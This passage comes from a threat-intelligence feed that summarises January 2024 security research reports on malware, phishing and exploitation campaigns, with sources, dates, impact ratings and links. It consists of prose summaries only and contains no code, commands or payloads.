- Date of Scan:
- 2024-01-22
- Impact:
- MEDIUM
- Summary:
- The article discusses a recent exploit of Ivanti Connect Secure, a remote access software, to install cryptominers on affected systems. It includes details on the files, file paths, IP addresses involved in the exploit, and recommendations for organizations to block the listed IPs. The article also provides a decoded URL and shell script used in the attack and advice for detecting and preventing similar attacks. The author shares their experience of discovering the exploit and provides a script that exploits Ivanti Connect Secure to install cryptominers. The article also discusses creating a plan for a task, including checking for sudo privileges and creating a system service for the miner. It also includes a configuration file for the miner and information on the pool it connects to.
Source:
https://www.greynoise.io/blog/ivanti-connect-secure-exploited-to-install-cryptominers
—
- Intel Source:
- CERT-UA
- Intel Name:
- Attack_With_UAC_0050_Using_RemoteUtilities
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Researchers from CERT-UA have uncovered evidence of a widespread dissemination of emails purporting to be from the State Emergency Service of Ukraine and the State Special Communications Service. The emails contained links to Bitbucket or a RAR archive and were ostensibly about “evacuations” and “virus removal.”
—
- Intel Source:
- Trellix
- Intel Name:
- Using_Discord_Bot_for_advanced_info_stealer
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- The article discusses a Java-based malware that is being spread through cracked software zip files. The malware uses a Discord bot channel as an EventListener to steal sensitive information from the victim’s system. The delivery mechanism and threat analysis of the malware are discussed, along with its capabilities of stealing various data from browsers and applications. The article also includes indicators of compromise and recommendations for protection against such threats.
—
- Intel Source:
- Checkmarx
- Intel Name:
- A_malicious_Python_package_analysis
- Date of Scan:
- 2024-01-20
- Impact:
- LOW
- Summary:
- Checkmarx researchers did a deep analysis of a malicious Python package. Threat actors continue to target the open-source space in the software industry, not only because it represents one of the largest attack surfaces, but because it often escapes the vigilant eyes of organizations.
Source:
https://checkmarx.com/blog/when-the-hunter-becomes-the-hunted/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_malicious_Python_script_attacks_macOS_apps
- Date of Scan:
- 2024-01-20
- Impact:
- LOW
- Summary:
- Xavier Mertens, an ISC SANS researcher, found a malicious Python script targeting wallet applications on macOS. It targets two applications, Exodus3 and Bitcoin Core, and searches for installations of them.
—
- Intel Source:
- Jamf
- Intel Name:
- New_malware_embedded_in_pirated_macOS_applications
- Date of Scan:
- 2024-01-20
- Impact:
- LOW
- Summary:
- Recently, Jamf Threat Labs researchers analyzed, in their blog, malware they observed in pirated macOS applications. These apps appeared similar to the ZuRu malware, downloading and executing multiple payloads to compromise machines in the background.
Source:
https://www.jamf.com/blog/jtl-malware-pirated-applications/
—
- Intel Source:
- Google Blog
- Intel Name:
- A_Russian_Threat_Group_Using_Malware_to_Target_Western_Officials
- Date of Scan:
- 2024-01-19
- Impact:
- MEDIUM
- Summary:
- Researchers from Google’s Threat Analysis Group have examined a number of persistent threats, such as COLDRIVER (also referred to as UNC4057, Star Blizzard, and Callisto), a Russian threat group that specializes in credential phishing attacks against prominent figures in NGOs, former military and intelligence officers, and NATO governments.
Source:
https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/
—
- Intel Source:
- Splunk
- Intel Name:
- An_analysis_of_the_DarkGate_AutoIt_Loader
- Date of Scan:
- 2024-01-19
- Impact:
- LOW
- Summary:
- The Splunk Threat researchers provided a deep analysis of DarkGate malware and its use of AutoIt in their blog.
—
- Intel Source:
- Huntress
- Intel Name:
- The_use_of_TeamViewer_by_ransomware_deployment
- Date of Scan:
- 2024-01-19
- Impact:
- LOW
- Summary:
- Huntress security analysts recently warned their customers about two disparate endpoints identified as having been impacted, at low severity, by ransomware. An investigation into each endpoint showed that initial access was achieved via TeamViewer.
Source:
https://www.huntress.com/blog/ransomware-deployment-attempts-via-teamviewer
—
- Intel Source:
- Rapid7
- Intel Name:
- A_new_stealer_named_Atlantida
- Date of Scan:
- 2024-01-19
- Impact:
- LOW
- Summary:
- This month, Rapid7 noticed a new stealer called Atlantida. The stealer makes users download a malicious file from a compromised website and uses different techniques, such as reflective loading and injection, before the stealer is loaded. Atlantida has many capabilities, from stealing login information for software like Telegram and Steam to collecting data from several offline cryptocurrency wallets, browser-stored data, and cryptocurrency wallet browser extension data. It also captures the victim’s screen and collects hardware data.
—
- Intel Source:
- Trustwave
- Intel Name:
- Stealthy_Godzilla_Webshell_Exploits_ActiveMQ_Vulnerability
- Date of Scan:
- 2024-01-19
- Impact:
- MEDIUM
- Summary:
- Researchers at Trustwave have seen an increase in attacks that exploit vulnerabilities in Apache ActiveMQ hosts. In some cases, the hosts are found serving malicious Java Server Pages (JSP) web shells. The web shells are made to elude security and signature-based scanners by being hidden inside an unidentified binary format. Interestingly, the web shell is still compiled and run by ActiveMQ’s JSP engine even though the binary’s file format is unknown.
—
- Intel Source:
- Volexity, CISA
- Intel Name:
- New_Observations_of_Ivanti_Connect_Secure_VPN_Exploitation
- Date of Scan:
- 2024-01-19
- Impact:
- MEDIUM
- Summary:
- Volexity shared details of new scanning and exploitation activity by threat actors using still non-public exploits to compromise different devices. Volexity has observed an increase in attacks from various threat actors against Ivanti Connect Secure VPN appliances beginning on January 16th, 2024. Among the new observations, a scan by Volexity for the GIFTEDVISITOR webshell led to the initial discovery of over 1,700 compromised Ivanti Connect Secure VPN devices. Also, UTA0178 had made modifications to the built-in Integrity Checker Tool. CISA also issued an Emergency Directive on the Ivanti vulnerabilities.
Source:
https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/
https://www.cisa.gov/news-events/alerts/2024/01/19/cisa-issues-emergency-directive-ivanti-vulnerabilities
—
- Intel Source:
- Phylum
- Intel Name:
- AnyDesk_Installed_With_OScompatible_Package_by_Npm_Trojan
- Date of Scan:
- 2024-01-19
- Impact:
- LOW
- Summary:
- An advanced remote access trojan has been discovered being installed on infected Windows computers by a malicious package posted to the npm registry. The package, dubbed “oscompatible,” was made available on January 9, 2024, and was downloaded 380 times in total before being removed.
Source:
https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/
—
- Intel Source:
- Security Score Card
- Intel Name:
- The_compromise_of_Cisco_devices_by_Volt_Typhoon
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- The Chinese state-sponsored group Volt Typhoon continues to actively compromise Cisco devices possibly affected by vulnerabilities publicly disclosed in 2019. Approximately 30% of the Cisco RV320/325 devices observed by SecurityScorecard in a 37-day period may have been compromised by Volt Typhoon. The Cisco RV320/325 vulnerability was publicly disclosed in January 2019. The devices are end-of-life, so Cisco has not released and will not release software updates to address vulnerabilities affecting them.
Source:
https://resources.securityscorecard.com/research/volt-typhoon
—
- Intel Source:
- Antiy
- Intel Name:
- A_Detailed_Analysis_of_Aquabot
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- Researchers from Antiy CERT have discovered a new version of the Mirai botnet that targets a variety of architectures, including X86, ARM, and MIPS. It waits for control instructions to launch DDoS attacks after infecting targets with weak passwords. They gave it the name Aquabot since the botnet file name is derived from “Aqua*”.
Source:
https://www.antiy.cn/research/notice&report/research_report/Aquabot.html
—
- Intel Source:
- Proofpoint
- Intel Name:
- A_Massive_Email_Campaign_Brings_TA866_Back
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- Researchers at Proofpoint have discovered that, following a nine-month hiatus, TA866 has reappeared in email campaign data. Proofpoint stopped a massive campaign with thousands of emails aimed at North America on January 11, 2024. Emails with an invoice theme included PDF attachments with titles like “Document_[10 digits].pdf” and different subject lines like “Project achievements.” The PDF files included OneDrive URLs that, when clicked, started a series of steps that eventually led to the malware payload: a WasabiSeed and Screenshotter custom variant.
Source:
https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta866-returns-large-email-campaign
—
- Intel Source:
- Microsoft
- Intel Name:
- High_Profile_Individuals_Targeted_by_Mint_Sandstorm_Campaign
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have been tracking a specific subset of Mint Sandstorm (PHOSPHORUS) since November 2023. This subset has been observed to target prominent persons who focus on Middle Eastern politics at universities and research institutions in Belgium, France, Gaza, Israel, the United Kingdom, and the United States. During this campaign, Mint Sandstorm attempted to trick targets into downloading infected files by using custom phishing lures. Microsoft discovered novel post-intrusion techniques in a few instances, including the introduction of a brand-new, specially designed backdoor known as MediaPl.
—
- Intel Source:
- Qianxin
- Intel Name:
- A_new_variant_of_the_Mirai_malware_known_as_Rimasuta
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- A new variant of the Mirai malware, known as Rimasuta, has recently resurfaced in samples captured by 360netlab in Japan, but has undergone a significant change in its encryption algorithm.
Source:
https://blog.xlab.qianxin.com/rimasuta-new-variant-switches-to-chacha20-encryption-en/
—
- Intel Source:
- Cyble
- Intel Name:
- Info_Stealing_Malware_Potentially_Targeting_Indian_Air_Force
- Date of Scan:
- 2024-01-18
- Impact:
- HIGH
- Summary:
- Researchers at Cyble have discovered a fresh spy operation that might use malware to steal information from the Indian Air Force. The unknown threat actor lured victims with phishing emails that included a link to a malicious .zip file purporting to provide information on Su-30 fighter jets. India authorized the purchase of these aircraft last year in order to support its current defense modernization initiatives.
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Install_Mimo_CryptoMiner_And_Mimus_Ransomware
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- Recently, ASEC researchers have documented instances where a CoinMiner threat actor named Mimo has installed malware by taking advantage of different vulnerabilities. In March 2022, they installed CoinMiners via a Log4Shell vulnerability exploitation, which is how Mimo, also known as Hezb, was initially discovered.
—
- Intel Source:
- CyberGeeks
- Intel Name:
- AI_generated_videos_attacked_Romania
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- Cybergeeks researchers continue to see the threat of AI-generated videos across different industries and recently saw a YouTube ad that presented a “unique” opportunity to invest in stocks. The attackers used a legitimate podcast that had been modified using AI. The researchers concluded that the account promoting the unlisted video was compromised.
Source:
https://cybergeeks.tech/attackers-target-romania-using-ai-generated-videos/
—
- Intel Source:
- Mcafee
- Intel Name:
- An_Overview_of_VBS_Script_Driven_Campaigns
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- Researchers at McAfee have observed a complex VBS campaign that uses obfuscated Visual Basic Scripting (VBS). After starting off as a campaign that distributed the AgentTesla malware, it has developed into a multifaceted threat that uses VBS scripts as a flexible delivery system. This campaign serves as an example of a thorough infection procedure that is started by an email-delivered VBS file. It begins with a VBS script that is activated, then it moves via PowerShell stages, using the BitsTransfer tool to retrieve a second PowerShell script.
—
- Intel Source:
- ASEC
- Intel Name:
- Spread_of_LockBit_Ransomware_Using_Word_Documents
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have discovered that starting last month, Word files are being used to spread the LockBit ransomware. Notably, malicious Word files were recently discovered to be masquerading as resumes, which is another way that the LockBit ransomware typically spreads. In 2022, it was discovered that the LockBit ransomware spreads using external URLs in Word documents.
—
- Intel Source:
- Esentire
- Intel Name:
- The_delivery_of_WorkersDevBackdoor
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- In November 2023, eSentire’s Threat Response Unit (TRU) detected WorkersDevBackdoor malware impacting a customer in the business services industry. This malware spreads through malicious online ads, tricking users into downloading it by mimicking legitimate software. Once installed, it secretly collects sensitive information and provides backdoor access to the infected system.
Source:
https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising
—
- Intel Source:
- Checkpoint
- Intel Name:
- Microsoft_as_the_top_number_impersonated_brand
- Date of Scan:
- 2024-01-17
- Impact:
- LOW
- Summary:
- In the last quarter of 2023, Microsoft held the top spot as the most impersonated brand, accounting for 33% of all brand phishing attempts. The technology sector stood out as the most targeted industry overall, Check Point researchers said.
—
- Intel Source:
- NSFocus Global
- Intel Name:
- The_New_Botnet_RDDoS
- Date of Scan:
- 2024-01-17
- Impact:
- LOW
- Summary:
- NSFOCUS’s Global Threat Hunting System discovered widespread distribution of an unknown ELF file, leading to the identification of a new botnet named RDDoS. This botnet, primarily designed for launching DDoS attacks, also possesses command execution capabilities, distinguishing it as a formidable threat. The botnet’s favored attack method is ICMP_flood, with the United States, Brazil, and France being its primary targets. The analysis reveals the botnet’s relatively uncomplicated nature, but its continuous updates and iterations pose an evolving threat. NSFOCUS emphasizes the need for heightened attention to emerging botnet families like RDDoS, stressing ongoing monitoring and offering an Anti-DDoS solution to counter this rising threat effectively.
Source:
https://nsfocusglobal.com/nsfocus-reveals-new-botnet-family-rddos/
—
- Intel Source:
- Sentinelone
- Intel Name:
- The_rise_of_infostealers_targeting_macOS
- Date of Scan:
- 2024-01-17
- Impact:
- MEDIUM
- Summary:
- In this post, SentinelOne shared details on three active infostealers that are currently evading many static signature detection engines.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Facebook_Scammers_Exploit_BBC_Branding_in_Morbid_Scheme
- Date of Scan:
- 2024-01-17
- Impact:
- LOW
- Summary:
- In a recent Facebook scam, cybercriminals employ BBC branding to lure victims into a morbid scheme. The scam involves posts claiming the tragic loss of someone, accompanied by a link to a fake BBC news item about a fatal road accident. The posts tag Facebook friends to trigger curiosity. Clicking on the link redirects users through various steps, likely performing fingerprinting to gather information. The scam uses a URL format like “BBCNEWS-{6 characters}.OMH4.XYZ.” While testing, the redirection led to a known source of pop-ups, potentially unwanted programs, and fraudulent sites. The article provides tips on avoiding Facebook scams, including scrutinizing URLs, reaching out to friends outside the platform for verification, being cautious of “free” offers, regular browser updates, changing login credentials, and using browser protection tools. Users are encouraged to report suspicious posts to protect themselves and others from online threats.
—
- Intel Source:
- Russian Panda
- Intel Name:
- Atomic_Stealer_First_MacOS_Threat_Unveiled
- Date of Scan:
- 2024-01-17
- Impact:
- MEDIUM
- Summary:
- Discovered in March 2023, Atomic Stealer is the inaugural MacOS-targeting stealer, offering a sophisticated panel for $3000 monthly. Boasting advanced features such as keychain extraction, password retrieval, and browser data theft, it recently evolved with encrypted strings and anti-VM checks. The threat minimizes traces on infected devices, presenting a formidable challenge to cybersecurity. Special thanks to Edward Crowder and @cod3nym for their contributions.
Source:
https://russianpanda.com/2024/01/15/Atomic-Stealer-AMOS/
—
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- Analysis_of_Keyholes
- Date of Scan:
- 2024-01-17
- Impact:
- LOW
- Summary:
- Keyhole is a multipurpose VNC/Backconnect component that is heavily utilized by Anubis and IcedID. Although the malware has features that have been previously documented as standard VNC and HDESK capabilities, there doesn’t seem to be much technical information available regarding some of the other features that are currently present.
Source:
https://medium.com/walmartglobaltech/keyhole-analysis-60302922aa03
—
- Intel Source:
- Cyble
- Intel Name:
- Azorult_malware_back
- Date of Scan:
- 2024-01-16
- Impact:
- LOW
- Summary:
- Cyble researchers came across the activity of old Azorult malware that was identified in 2016 and functions as an information-stealing threat. It can get diverse data, including browsing history, cookies, login credentials, and cryptocurrency details.
Source:
https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/
—
- Intel Source:
- CISA
- Intel Name:
- Threat_actors_deployed_an_Androxgh0st_malware
- Date of Scan:
- 2024-01-16
- Impact:
- HIGH
- Summary:
- The FBI and CISA are releasing a joint cybersecurity advisory about the threat associated with threat actors deploying Androxgh0st malware. Androxgh0st malware has been observed establishing a botnet for victim identification and exploitation in target networks.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a
https://www.cisa.gov/sites/default/files/2024-01/aa24-016a-known-indicators-of-compromise-associated-with-adroxgh0st-malware_0.pdf
—
- Intel Source:
- TrendMicro
- Intel Name:
- Phemedrone_Malware_Dropped_by_Windows_SmartScreen_Bug
- Date of Scan:
- 2024-01-16
- Impact:
- LOW
- Summary:
- Trend Micro researchers discovered a malware campaign employing Phemedrone, which exploits a Microsoft Defender SmartScreen vulnerability to bypass Windows security prompts when opening URL files. This open-source info-stealer focuses on extracting data from web browsers, cryptocurrency wallets, and applications like Discord, Steam, and Telegram. The gathered data is then sent to attackers for potential malicious purposes or sale to other threat actors.
—
- Intel Source:
- ANY.RUN
- Intel Name:
- Detailed_Analysis_of_Pure_Malware_Family
- Date of Scan:
- 2024-01-16
- Impact:
- LOW
- Summary:
- Researchers from AnyRun have examined PureCrypter, one of the most peculiar crypters, and PureLogs, a multipurpose stealer. Several intriguing samples were discovered by them while they were reviewing Public Submissions. Unusual traffic that appeared to be related to encryption operations on executable files with short keys and high entropy TCP connections piqued their interest.
Source:
https://any.run/cybersecurity-blog/pure-malware-family-analysis/
—
- Intel Source:
- ASEC
- Intel Name:
- Remcos_RAT_Distributing_via_Webhards
- Date of Scan:
- 2024-01-15
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that webhards are being used to spread the Remcos RAT malware, which is masquerading as adult games. In Korea, webhards and torrents are popular delivery channels for malware.
—
- Intel Source:
- TrueSec
- Intel Name:
- A_Mallox_Ransomware_Victim
- Date of Scan:
- 2024-01-15
- Impact:
- LOW
- Summary:
- The Mallox threat actor has a history of gaining initial access by taking advantage of vulnerable MSSQL servers. The first signs of the threat actor were discovered during the analysis of an unprotected MSSQL web server. Many dropper PowerShell scripts were found in the AppData directory of the service account that was running the SQL service, the script “alta.ps1” being one example.
Source:
https://www.truesec.com/hub/blog/a-victim-of-mallox-ransomware-how-truesec-csirt-fought-back
—
- Intel Source:
- Sucuri
- Intel Name:
- WordPress_Sites_Are_Infected_by_Balada_Injector
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- In a campaign that began in mid-December, a little over 6,700 WordPress websites that used a vulnerable version of the Popup Builder plugin were compromised by the Balada Injector malware.
—
- Intel Source:
- Forescout
- Intel Name:
- Denmark_and_Ukraines_Energy_Sector_Attacks
- Date of Scan:
- 2024-01-12
- Impact:
- MEDIUM
- Summary:
- Forescout researchers have analyzed two newly publicized attacks targeting the energy sectors in Denmark and Ukraine. So far, the attacks have been linked, if tenuously, to the Russian military threat actor Sandworm, one of the most well-known APT organizations operating at the moment.
Source:
https://www.forescout.com/resources/clearing-the-fog-of-war/
—
- Intel Source:
- Trendmicro
- Intel Name:
- FIFA_World_cyber_threats
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- Trend Micro, a cybersecurity company, played a crucial role in protecting the 2022 FIFA World Cup from cyber threats. They collaborated with law enforcement, particularly INTERPOL, to monitor and report any malicious websites and scams related to the event. Their global threat intelligence was also shared to prevent attacks and mitigate risks. The article delves into the various cyber threats discovered, including fake ticketing systems, live streaming sites, survey scams, and crypto scams. By supporting INTERPOL and the World Cup, Trend Micro fulfilled its mission of making the digital world a safer place.
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_Medusa_ransomware_capabilities
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- The article discusses the Medusa ransomware and its capabilities, including the use of two drivers to target specific security products and a customized tool for remote deployment. It also mentions the use of remote scripting and Cyrillic scripts, possibly referencing the creators’ preferred language. The article provides a list of commands to stop various services on a computer to prevent the ransomware from encrypting files. It also discusses the use of string and RSA encryption for protecting the ransomware’s key. The article mentions the escalation of Medusa ransomware activities and a shift towards extortion, as well as the involvement of the Unit 42 Incident Response team in a Medusa incident. It provides protections and mitigations for Palo Alto Networks customers and discusses the tools and techniques used by the Medusa group, including webshells and defense evasion techniques.
Source:
https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0050_Armed_RemcosRAT_QuasarRAT_RemoteUtilities
- Date of Scan:
- 2024-01-12
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have located and examined numerous emails carrying an attachment, a ZIP archive bearing the same name as the email. The archive contains a TXT file holding a password and a password-protected multivolume RAR archive.
—
- Intel Source:
- Zscaler
- Intel Name:
- A_New_Exploit_Module_From_DreamBus_Releases_Metabase_Mayhem
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- Researchers from Zscaler’s ThreatLabz have tracked down the DreamBus malware family, which is based on Linux. Other than a few minor bug patches and slight adjustments to avoid being detected by security software, not much has changed in the last several years. To exploit weaknesses in Metabase and Apache RocketMQ, the threat actor behind DreamBus has, nevertheless, released two new modules during the past six months.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- An_Analysis_of_Phishing_Email
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- SANS researchers have discussed how obfuscation works in malicious scripts. They discovered a VB script that poses as a PDF document. It arrived, as usual, in the form of a zip archive attached to a phishing email. “rfw_po_docs_order_sheet_01_10_202400000000_pdf.vbs” is the filename.
Source:
https://isc.sans.edu/diary/One+File+Two+Payloads/30558/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Mac_users_facing_a_New_Year_threat_with_the_Obfuscated_Atomic_Stealer
- Date of Scan:
- 2024-01-11
- Impact:
- LOW
- Summary:
- Malwarebytes researchers discovered an upgraded version of the Atomic Stealer, actively targeting Mac users through malicious ads on Google Search. This insidious threat is specifically designed to harvest passwords and other sensitive files that are usually restricted in access.
—
- Intel Source:
- Volexity
- Intel Name:
- Ivanti_Connect_Secure_VPN_Exploited
- Date of Scan:
- 2024-01-11
- Impact:
- MEDIUM
- Summary:
- Researchers from Volexity have discovered that two vulnerabilities in Ivanti Connect Secure VPN devices allowing unauthenticated remote code execution are now being exploited in the wild.
—
- Intel Source:
- Sentinelone
- Intel Name:
- FBot_Malware_Targeting_Cloud_and_Payment_Services
- Date of Scan:
- 2024-01-11
- Impact:
- LOW
- Summary:
- Researchers at SentinelLabs have discovered a Python-based hacking tool called FBot that differs from previous families of cloud malware, targeting cloud services, SaaS platforms, and web servers such as Office365, AWS, PayPal, Sendgrid, and Twilio.
—
- Intel Source:
- ForcePoint
- Intel Name:
- A_Novel_Advanced_Malware_Attack_on_Microsoft_Office
- Date of Scan:
- 2024-01-10
- Impact:
- MEDIUM
- Summary:
- Researchers from Forcepoint X-Labs have discovered a sophisticated Microsoft Office-based attack that targets well-known corporate executives just before a nation’s general elections.
Source:
https://www.forcepoint.com/blog/x-labs/advanced-malware-attack-using-microsoft-office
—
- Intel Source:
- Esentire
- Intel Name:
- Ducktail_and_Peeling_PowerShell_Layers
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- The eSentire Threat Response Unit discovered a failed attempt to infect an employee working in digital marketing at a business services company with Ducktail malware. The employee received a private message from Ducktail distributors on LinkedIn, along with an attachment that opened a ZIP archive.
Source:
https://www.esentire.com/blog/ducktail-and-peeling-the-layers-of-powershell
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Targeting_YouTube_Channels_to_Scatter_Lumma_Stealer
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Researchers at FortiGuard Labs have identified a threat group using YouTube channels to spread a Lumma Stealer variant. This actor targets sensitive information, including user credentials, system details, browser data, and extensions.
Source:
https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube
—
- Intel Source:
- Garwarner
- Intel Name:
- Storm_1152_used_their_CAPTCHA_cracking_capabilities
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Microsoft’s Digital Crime Unit posted a deep analysis of how it disrupts cybercrime. In their post they discuss the case against the hacker group called Storm-1152. The DCU team believes that Storm-1152 used its CAPTCHA-cracking capabilities to assist other criminals in the mass creation of Microsoft email accounts, such as Hotmail and Outlook accounts. 750 MILLION email accounts were created for illicit purposes.
Source:
https://garwarner.blogspot.com/2023/12/vietnams-massive-captcha-crackers-vs.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- User_agent_web_resource_connection
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Jesse La Grew, ISC SANS researcher, explained in his paper how devices regularly connect to different web resources, and how one method of identifying what is connecting to a web resource is through its user agent.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Protection_analysis_against_GuLoader_and_RedLine_Stealer_malware
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Palo Alto Networks’ Unit 42 presented selected configuration protection techniques employed by two malware families: GuLoader and RedLine Stealer.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Year_themed_spam_emails_campaign
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Cyble researchers discovered a ZIP archive file that could potentially spread through New Year-themed spam emails. The ZIP attachment contains a shortcut file disguised as a PNG image.
Source:
https://cyble.com/blog/festive-facade-dissecting-multi-stage-malware-in-new-year-themed-lure/
—
- Intel Source:
- Securonix
- Intel Name:
- Turkish_Hackers_Target_MSSQL_servers_to_deliver_MIMIC_Ransomware
- Date of Scan:
- 2024-01-10
- Impact:
- MEDIUM
- Summary:
- Financially motivated Turkish threat actors appear to be actively targeting MSSQL servers in an effort to deliver MIMIC ransomware payloads. The Securonix Threat Research team has been monitoring an ongoing threat campaign, RE#TURGENCE, which involves the targeting and exploitation of MSSQL database servers to gain initial access. The threat actors appear to be targeting US, EU and LATAM countries and are financially motivated.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Deep_analysis_of_a_mining_threat_spreaded_through_a_YouTube
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- This comprehensive analysis delves into the dissemination of cryptocurrency miners through a YouTube channel. Examining the tactics employed, the report reveals a concerning trend of malicious actors leveraging popular video-sharing platforms to distribute mining threats. The study explores the various evasion techniques employed by threat actors to avoid detection. Additionally, it sheds light on the processes for generating resilient malware payloads.
—
- Intel Source:
- Aquasec
- Intel Name:
- A_new_attack_targeting_Apache_Hadoop_and_Flink_applications
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- The article discusses a new cyber attack targeting Apache Hadoop and Flink applications, which was uncovered by researchers at Aqua Nautilus. The attack involves the use of packers and rootkits to conceal the malware, making it difficult for traditional security defenses to detect. The attack exploits a misconfiguration in the ResourceManager of Hadoop YARN, allowing unauthenticated users to create and run applications.
Source:
https://blog.aquasec.com/threat-alert-apache-applications-targeted-by-stealthy-attacker
—
- Intel Source:
- TrendMicro
- Intel Name:
- Pikabot_Malware_Thirstily_Involved_In_Spam_Campaigns
- Date of Scan:
- 2024-01-10
- Impact:
- HIGH
- Summary:
- TrendMicro researchers report that Pikabot is actively involved in spam campaigns that result in ransomware attacks using Black Basta. Pikabot consists of a loader and a core module that allows unauthorized remote access and the execution of arbitrary commands over an established connection with its C&C server; the operators use these two components to target victims in their phishing campaigns.
Source:
https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html
—
- Intel Source:
- Cyfirma
- Intel Name:
- Syrian_Hackers_Distributing_Stealthy_C_Sharp_Based_Silver_RAT
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Researchers at Cyfirma have shed light on how RAT development is changing and on the nefarious actions carried out by threat actors going by the handle “Anonymous Arabic.” The researchers examined Silver RAT, which is built in C# and can discreetly launch browsers, hidden apps, keyloggers, and other dangerous programs while evading antivirus software.
—
- Intel Source:
- Greg Lesnewich
- Intel Name:
- New_North_Korean_macOS_Backdoor
- Date of Scan:
- 2024-01-08
- Impact:
- LOW
- Summary:
- A new backdoor for Apple macOS named SpectralBlur has been found by cybersecurity experts. It overlaps with a family of malware that is known to be associated with North Korean threat actors.
Source:
https://g-les.github.io/yara/2024/01/03/100DaysofYARA_SpectralBlur.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- Attacks_on_Ukrainian_Servicemen_Targeting_Recruitment_to_3rd_OSHBr_And_IDF
- Date of Scan:
- 2024-01-08
- Impact:
- MEDIUM
- Summary:
- Experts from Trendmicro notified CERT-UA of the discovery of suspicious files, the majority of which had military themes. Based on the information that was obtained, CERT-UA moved to look into a number of cyberattacks that are targeting soldiers of the Armed Forces of Ukraine under the pretense of recruiting for the Israel Defense Forces (IDF) and the 3rd Separate Assault Brigade.
—
- Intel Source:
- Hunt & Hackett
- Intel Name:
- Dutch_IT_And_Telecom_Firms_Targeted_by_Turkish_Sea_Turtles_Group
- Date of Scan:
- 2024-01-08
- Impact:
- LOW
- Summary:
- The cyber espionage group Sea Turtle (also known as Teal Kurma, Marbled Dust, SILICON, and Cosmic Wolf) has been detected by researchers from the Dutch security firm Hunt & Hackett targeting Kurdish websites, media, ISPs, telcos, and IT service providers in the Netherlands.
Source:
https://www.huntandhackett.com/blog/turkish-espionage-campaigns
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Unusual_Prometei_Botnet_Behavior
- Date of Scan:
- 2024-01-08
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have discovered that following several attempts at logging in with different usernames and passwords, the actor utilizing the IP
Source:
https://isc.sans.edu/diary/Suspicious+Prometei+Botnet+Activity/30538/
—
- Intel Source:
- Palo Alto
- Intel Name:
- JinxLoader_Delivers_Next_Stage_Malware_Like_Formbook_and_XLoader
- Date of Scan:
- 2024-01-05
- Impact:
- LOW
- Summary:
- Researchers from Symantec and Palo Alto Networks alerted us to the existence of JinxLoader, a new Go-based malware loader that is being used to spread next-stage payloads like XLoader and Formbook. The malware was noticed in November 2023, and it has reportedly been promoted on the hacking community Hackforums since April 30, 2023. The researchers detected an attack that employed phishing messages purporting to be from the Abu Dhabi National Oil Company (ADNOC).
Source:
https://twitter.com/Unit42_Intel/status/1730237085246775562
—
- Intel Source:
- AT&T
- Intel Name:
- Decoys_Govno_DGAs_And_Obfuscation_in_AsyncRAT_Loaders
- Date of Scan:
- 2024-01-05
- Impact:
- LOW
- Summary:
- Researchers at AT&T Alien Labs have discovered a campaign to install AsyncRAT on victim PCs without their knowledge. This threat actor has been distributing the RAT via an initial JavaScript file embedded in a phishing page for at least 11 months. The threat actor has remained steadfast in its goals, having produced more than 300 samples and more than 100 domains.
Source:
https://cybersecurity.att.com/blogs/labs-research/asyncrat-loader-obfuscation-dgas-decoys-and-govno
—
- Intel Source:
- ClearSkySec
- Intel Name:
